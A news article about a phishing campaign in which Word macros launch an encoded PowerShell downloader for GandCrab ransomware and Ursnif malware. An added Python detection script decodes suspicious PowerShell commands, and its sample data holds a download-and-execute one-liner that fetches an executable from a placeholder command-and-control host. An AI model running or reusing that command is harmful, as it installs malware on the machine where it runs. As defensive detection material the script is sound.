A clever phishing campaign that leverages Word attachments spreads two nasty cyberthreats: the GandCrab ransomware and the Ursnif malware.
For those who don't know, GandCrab ransomware has already been spotted in several campaigns over the past year, including hidden on legitimate but compromised websites and infecting victims via a December sextortion campaign.
The Ursnif executable, meanwhile, is a serious threat that performs an array of malicious activities such as credential harvesting, gathering system and process information, and deploying additional malware samples.
The malicious Word attachments use embedded macros to infect the targeted systems with malware and ransomware.
This new cyber attack uses a combination that first harvests credentials, system and process information, and then encrypts sensitive data.
The infection starts with phishing emails that contain a Word document with embedded macros.
The malicious macros call an encoded PowerShell script that downloads and executes both the Ursnif malware and the GandCrab ransomware.
Cybersecurity experts say that the campaign is still active and uses, or will use, other threats as well, because additional payloads are being posted on pastebin.com.
Remember: everything can be hacked. To stay away from any threats related to the cyber world, we recommend installing an antivirus for Windows or an antivirus for Mac on every device that you own, depending on which OS it is running. If you are a company, it is also recommended to hire a specialized cybersecurity company every year to run annual tests on your company's network. These tests include penetration testing and ethical hacking tests.
Cyberattack modus operandi
At first, the initial phishing emails deliver a Microsoft Word document that is used to deploy the early stages of the attack.
These infected documents contain a VBS macro that, once activated, runs a total of 650 lines of code, of which only 18 lines are relevant; the others are just a decoy.
The 18-line PowerShell script then downloads and executes two pieces of malware from a hard-coded command-and-control address: the GandCrab ransomware and the Ursnif malware.
For now, no additional data is available regarding the number of victims, but a total of 180 Word document variants have been spotted in this malicious campaign, which seriously raises the chances of high infection rates. These variants were presumably created in batches that were then sent to a large number of potential victims.
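The chain described above (a Word macro launching an encoded PowerShell downloader) leaves a recognisable trace in process-creation telemetry. The following detection script is an added example and is not part of the original article; it runs over constructed sample events, and the paths, hostnames and command lines in it are placeholders, not indicators from this campaign.

```python
import base64
import re

def encode_ps(script: str) -> str:
    """PowerShell's -EncodedCommand takes base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")

# Constructed process-creation events (parent image, child image, command line).
# Event 0 mimics Word spawning an encoded download-and-execute one-liner;
# event 1 is a benign admin script launched from Explorer.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + encode_ps(
         "(New-Object Net.WebClient).DownloadFile('http://c2.example.invalid/a.exe',"
         "\"$env:TEMP\\a.exe\"); Start-Process \"$env:TEMP\\a.exe\"")},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
]

OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe")
# Cmdlets/methods typical of a downloader stage; matched on the decoded script.
SUSPICIOUS = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|start-process|invoke-expression|\biex\b",
    re.I)
ENC_FLAG = re.compile(r"(?<!\S)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(cmdline: str):
    """Return the decoded script behind -enc/-EncodedCommand, or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage_event(event: dict) -> list:
    """Tag one event with the detection signals it triggers."""
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    image = event["image"].rsplit("\\", 1)[-1].lower()
    findings = []
    if image == "powershell.exe" and parent in OFFICE_PARENTS:
        findings.append("office-spawned-powershell")
    decoded = decode_encoded_command(event["cmdline"])
    if decoded is not None:
        findings.append("encoded-command")
        if SUSPICIOUS.search(decoded):
            findings.append("download-and-execute")
    return findings
```

Any event carrying all three tags is worth an immediate look; the decoded script also gives the responder the download URL without having to open the document.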
We will continue to monitor this cybersecurity problem. Meanwhile, users should keep a keen eye out for any cyber attacks. Remember to use an antivirus for Windows or an antivirus for Mac on every device that you own, depending on which OS your machine is running. If you are a company, we recommend hiring a specialized cybersecurity company every year to run annual tests on your company's network; such tests include penetration testing and ethical hacking.